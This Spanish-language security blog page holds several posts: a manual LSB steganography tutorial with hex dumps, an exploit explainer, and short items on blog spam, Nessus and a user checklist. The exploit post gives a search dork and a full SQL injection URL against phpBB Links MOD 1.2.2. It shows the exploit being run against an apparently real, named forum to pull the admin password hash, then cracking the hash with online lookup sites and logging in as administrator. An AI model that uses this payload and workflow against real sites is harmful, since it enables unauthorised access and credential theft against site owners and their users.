MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

13.6.08

Esteganografía manual

Ante un estegoanalisis del que hablaremos más adelante la mejor técnica para evadirlo es la técnica manual. Para realizar la técnica manual se usa el método LSB (inserción del último bit significante) que consiste en convertir el mensaje a nivel de bits usando la tabla ASCII. El primer paso es estudiar el fichero de imagen a modificar buscando los grupos que conforman cada píxel y deducir cual es la cifra menos significativa. Después sumaremos 1 a dicha cifra cuando el bit del mensaje sea 1 y dejaremos la cifra intacta cuando sea 0, a partir de una determinada posición sin modificar la cabecera. Cada modificación en el fichero cambiara el color de la imagen un punto. Para recuperar el mensaje solo hay que comparar el fichero modificado con el original a partir de la posición modificada.

Ejemplo:

Abrimos el archivo de imagen con un editor hexadecimal:

471696 93 81 d8 1b e9 84 aa 25 18 f4 2b 1b 52 30 41 79 0
471712 a8 4d 1b 03 19 3c 9e a0 d4 b6 33 ea 72 cc 25 25 0
471728 76 d6 d5 c8 da 4d 9f 34 93 81 d8 1b e9 84 aa 43 0
471744 d4 b6 33 ea 72 cc 25 2c 76 d6 d5 c8 da 4d 9f 35 0
471760 18 f4 2b 1b 52 30 41 79 a8 4d 1b 03 19 3c 9e a1 0
471776 ca 95 c3 9c f3 4d 73 c2 0f 1b 9e c0 f7 25 30 41 0
471792 33 7e 26 ae ef 1d 79 7c e2 26 ac eb e4 cc 2c b7 0
471708 0f 1b 9e c0 f7 25 30 41 ca 95 c3 9c f3 4d 73 11 0

Mirando la tabla ASCII el carácter A en binario 0100 0001.
Sumamos 1 cuando el bit del carácter sea 1 y dejamos la cifra intacta cuando sea 0, a partir de la posición 471696.

471712 a8 4d 1b 03 19 3c 9e a0 d4 b6 33 ea 72 cc 25 25
______________________________________________ +1
471712 a8 4d 1b 03 19 3c 9e a0 d4 b6 33 ea 72 cc 25 26

471708 0f 1b 9e c0 f7 25 30 41 ca 95 c3 9c f3 4d 73 11
_____________________________________________+1
471708 0f 1b 9e c0 f7 25 30 41 ca 95 c3 9c f3 4d 73 12

Queda codificado:

471696 93 81 d8 1b e9 84 aa 25 18 f4 2b 1b 52 30 41 79 0
471712 a8 4d 1b 03 19 3c 9e a0 d4 b6 33 ea 72 cc 25 26 1
471728 76 d6 d5 c8 da 4d 9f 34 93 81 d8 1b e9 84 aa 43 0
471744 d4 b6 33 ea 72 cc 25 2c 76 d6 d5 c8 da 4d 9f 35 0
471760 18 f4 2b 1b 52 30 41 79 a8 4d 1b 03 19 3c 9e a1 0
471776 ca 95 c3 9c f3 4d 73 c2 0f 1b 9e c0 f7 25 30 41 0
471792 33 7e 26 ae ef 1d 79 7c e2 26 ac eb e4 cc 2c b7 0
471708 0f 1b 9e c0 f7 25 30 41 ca 95 c3 9c f3 4d 73 12 1

Para descodificar se compara la imagen esteganografiada con la original a partir de la posición 471696.

Más información:
http://vtroger.blogspot.com/2008/01/esteganografia-avanzada.html
http://vtroger.blogspot.com/2006/09/ocultar-ficheros-con-tcnicas-de.html
http://vtroger.blogspot.com/2008/06/esteganografia-manual.html

# pistus

Ver más

9.4.08

Ejemplo de cómo funciona un exploit

Quienes no saben lo que son los exploits les sugiero que lean detenidamente este artículo porque son justamente estas herramientas las que utilizan los crackers para infiltrarse en sistemas desprotegidos o descuidados, los cuales muchas veces permiten accesos de root o Administrador en la máquina afectada. Vamos por paso, en primer lugar ¿que es un exploit?. Son pequeños trozos de código (en cualquier lenguaje) que están escritos para aprovecharse de vulnerabilidades y/o errores específicos dentro de un sistema... para lograr acceder a él de forma ilegítima o causar otro tipo de problemas.

Hay que tener en cuenta siempre que TODOS los software del mundo son desarrollados por humanos, por lo tanto es normal encontrarse con errores en los códigos. Estos errores, comúnmente llamados
bugs, pueden ser del tipo desbordamiento de búfer (buffer overflow), condición de carrera (race condition), errores de validación de variables, etc, etc.

Por ejemplo si se encontró un error en un software de correo el cual al enviar un telnet al servidor y ejecutar una serie de instrucciones, satura el búfer del software de correos y provoca una denegación de servicio (DoS). Entonces un hacker escribirá un código que sirva para explotar (de ahí el nombre "exploit) esta vulnerabilidad y con un par de instrucciones más quizá sea posible abrir un acceso remoto con permisos de root en el servidor afectado.

Podríamos catalogar a los exploits en dos tipos diferentes:
1.- 0-day
2.- Públicos

Los exploits de tipo 0-day son aquellos que los hackers mantienen ocultos al mundo y los utilizan para explotar los sistemas que quieren. De alguna manera son trozos de código privados.
Por otro lado los exploits públicos son aquellos que los hackers decidieron no utilizar más en su propio beneficio y los liberan públicamente a algunos de los sitios webs más conocidos como www.milw0rm.com, www.securityfocus.com, www.packetstormsecurity.org, etc. Muchas veces pueden pasar varios meses o años entre que el exploit pase de condición 0-day a ser público. Es por esto mismo que los primeros son más peligrosos, ya que al no conocerse la vulnerabilidad y no ser pública entonces existen muchos más servidores afectados cuyos administradores ni siquiera se enteran de que pueden ser atacados. Al hacerse públicos, normalmente se entrega la solución o bien los fabricantes de software reaccionan y sacan una actualización de seguridad crítica.

Esta es la razón por la cual hay que siempre tener dos cosas presentes:
1.- El tipo de software y la versión exacta que tenemos instalado en nuestras máquinas, ya sea como cliente (ejemplo Microsoft Outlook) o servidor (Exchange, Postfix, Sendmail, etc)
2.- Nunca dejar de revisar los sitios de exploits mencionados anteriormente. Increíblemente hay gente que se dedica a estar atentos a estos exploits para inmediatamente cuando se publica comenzar a atacar sitios webs. Estos son los llamados script-kiddies. Pero por más despectivo que parezca el nombre, son igualmente peligrosos.

Debido a eso es que en la columna izquierda de este sitio web aparecen las últimas vulnerabilidades y exploits encontrados que han sido publicadas.

Ejemplo de un exploit:
Hace un par de días (31 de Agosto) atrás salió en www.milw0rm.com el siguiente exploit:
phpBB Links MOD 1.2.2 Remote SQL Injection Exploit
El texto es bastante claro. El módulo "Links" del sistema de foros llamado phpBB en su versión 1.2.2 es vulnerable a inyección SQL remota. Estos significa que mediante la URL es posible interactuar directamente con la base de datos (en este caso MySQL) para, entre otras cosas, obtener la password de Administrador y poder loguearse como tal.
Para ver el exploit haga click aquí.

Este exploit no es muy largo (ya dijimos que son pequeños trozos de código escritos para una vulnerabilidad específica) y está escrito en lenguaje PERL. Por lo tanto para ejecutarlo habrá que tener PERL instalado en nuestras máquinas. Los sistemas Linux/UNIX vienen con PERL.

Lo que se hace es copiar el código y guardarlo en un archivo con extensión .pl (de PERL).

h4x0r@tarro:~/Desktop/exploit$ ls -lh
total 4,0K
-rw-r--r-- 1 h4x0r h4x0r 1,5K 2007-09-03 11:53 phpBB2.pl
h4x0r@tarro:~/Desktop/exploit$

y simplemente ejecutarlo. En este caso nos irá pidiendo los datos del sitio web que queremos atacar. Pondré en rojo esto para diferenciarlo.

h4x0r@tarro:~/Desktop/exploit$ perl phpBB2.pl

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=
asd&start=1,1%20UNION%20SELECT%201,
username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20
phpbb_users%20WHERE%20user_id=2/*

=> Insert URL
=> without ( http )
=>

www.motoqueros.cl

=> Insert directory
=> es: /forum/ - /phpBB2/
=>

/foros/

=> User ID
=> Number:
=>

1

Exploit in process...
Exploit
in process...
Exploit finished!
MD5-Hash is: 827ccb0eea8a706c4c34a16891f84e7b

Y eso sería todo. El exploit fue capaz de conectarse a la base de datos y recuperar el password cifrado del usuario con ID 1 (admin en este caso). Esta cadena de 32 caracteres corresponde a un hash en md5. De mucho no nos sirve tener la clave cifrada, pero podemos recuperarla atacándola con fuerza bruta (o diccionario) en los siguientes sitios web:
http://md5.xpzone.de/
http://gdataonline.com/seekhash.php
Ponemos el hash y comprobamos la la clave de admin es 12345. Ahora podemos loguearnos en http://www.sitioweb.com/foros/ usando estos datos.

Existen exploits mucho más elaborados y poderosos, pero esto fue un ejemplo para mostrar cuan simple puede ser recuperar una contraseña o acceder ilegítimamente a un servidor cuando se le aplican los exploits correctos.

Fuente: http://www.seguridad-informatica.cl

Ver más

SPLOG: COMENTARIOS NO DESEADOS EN TU BLOG
Los Blogs fueron desarrollados pensando en la comunicación entre usuarios y la creación de comunidades, por lo que se permite la interacción entre ellos.
El dueño del Blog, escribe sobre una temática determinada y sus lectores tienen la posibilidad de realizar comentarios sobre cada post (artículo) desarrollado.

Actualmente, esta nueva forma de interacción es la que brinda la posibilidad de realizar publicidad no deseada o incluso, permitir la propagación de códigos dañinos.
Esta nueva técnica denominada Splog -palabra originada de la combinación de Spam más Blog- permite que un sitio web sea publicitado a través de comentarios que son agregados a Blogs.

Estos comentarios pueden contener publicidad y/o enlaces a otros sitios que, en algunos casos, pueden alojar adware, spyware y otros códigos maliciosos.


Seguir leyendo

Fuente: www.eset-la.com

Ver más

TUTORIAL DE NESSUS, UN EXCELENTE AUDITOR DE VULNERABILIDADES
Nessus es uno de los scanners de vulnerabilidades más utilizados en el mundo, ya que no tiene costo por instalación y uso, y a la vez uno de los más respetados debido a la gran cantidad de información que es capaz de obtener de los sistemas que audita.

Originalmente fue desarrollado para funcionar únicamente sobre plataformas Unix, pero con el tiempo se abrió paso a la posiblidad de funcionar con la misma eficacia sobre sistemas Windows. Nessus es un software que trabaja en modo cliente-servidor. El servidor es quien se encarga de realizar todas las auditorías y el cliente es la interfaz por donde se le dan las indicaciones correspondientes, como por ejemplo IP o dominio de la máquina a escanear, tipo de auditoría, modo de informe, etc.

La ventaja es que se puede tener el... servidor montado en una máquina Linux/Unix y el cliente se puede instalar en Windows.

Es una herramienta fundamental para todos quienes deseen darle un poco más de seguridad a sus sistemas ya que se encargará de decirnos la gran mayoría de problemas que tenemos, como explotarlos y mejor aún, como solucionarlos. Aunque quizá el mayor inconveniente es que todos los resultados los muestra únicamente en idioma inglés, por lo que hay que conocer bastante bien a nivel técnico las definiciones informáticas pertinentes. De acuerdo a Ron Gula, Gerente General de Teenable Security, la empresa detrás de Nessus, el problema de implementar múltiples idiomas es el soporte en caso de problemas y además que se debiesen traducir los más de 20 mil plugins con los que cuenta este software. Por ahora no tienen intenciones de trabajar con otro idioma aparte de inglés, por lo que habrá que acostumbrarse.

La versión para Windows (que puede ser descargada desde www.nessus.org), incluye todo en uno el servidor y el cliente para ser instalados automáticamente en la misma máquina, por lo cual resulta muy sencillo comenzar a trabajar con él.

Para quienes se interesen más en probar este gran scanner pueden revisar los siguientes enlaces:
- Website oficial
- Tutorial en español
- Video demostrativo de uso de Nessus. (en inglés).

Fuente: http://www.seguridad-informatica.cl

Ver más

UN SIMPLE CHECKLIST DE SEGURIDAD PARA PERSONAS CON CONOCIMIENTOS A NIVEL DE USUARIO
Si usted es de esas personas que acostumbra a sentirse un poco alejado de este tipo de sitios web donde la temática a tratar parece tan técnica y alejada a su realidad debido a la profundidad de los artículos y comentarios en lo que respecta a seguridad informática, entonces esta guía le será muy útil. Pensando en que la seguridad informática NO DEBE ser algo de exclusivo conocimiento y manejo de usuarios avanzandos, administradores de sistema, jefes de informática y similares si no que también de usuarios que no tienen mayor relación con los computadores que leer el diario online, leer el correo o utilizar mensajería instantánea, he elaborado una breve pero efectiva lista de chequeos que le ayudará a tener una idea de qué tan vulnerable puede estar usted a sufrir un ataque hacia sus datos. Vale decir que aunque el documento está orientado a usuarios con conocimientos mínimos de computación, también puede ser revisado por cualquier persona que le guste llevar un orden en cuanto a sus datos privados.

Para revisar el checklist haga click EN ESTE ENLACE

Fuente: http://www.seguridad-informatica.cl

Ver más